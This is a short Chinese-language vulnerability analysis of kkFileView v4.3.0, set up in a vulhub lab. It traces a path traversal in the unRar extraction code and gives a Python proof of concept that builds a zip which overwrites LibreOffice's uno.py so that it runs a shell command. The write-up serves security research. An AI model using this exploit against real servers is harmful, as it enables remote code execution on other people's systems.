调试环境

环境使用vulhub,源码版本v4.3.0,参考https://github.com/kekingcn/kkFileView/archive/refs/tags/v4.3.0.tar.gz

漏洞分析

cn.keking.service.CompressFileReader#unRar中自己实现了解压的逻辑

1
OutputStream out = new FileOutputStream( extractPath+ folderName + "_" + File.separator + str[0], true);

其中写文件的路径使用了拼接的办法导致了路径穿越,导致了任意文件写

kkFileView在使用odt转pdf时会调用系统的Libreoffice,而此进程会调用库中的uno.py文件,因此可以覆盖该py文件的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'vulhub'
        binary2 = b"import os\nos.system('touch /tmp/success')\n"
        zipFile = zipfile.ZipFile("abc.zip", "a", zipfile.ZIP_DEFLATED)
        # info = zipfile.ZipInfo("test.zip")
        zipFile.writestr("abc.txt", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py", binary2)
        zipFile.close()
    except IOError as e:
        raise e

Reference

https://xz.aliyun.com/t/14315

https://forum.butian.net/share/2938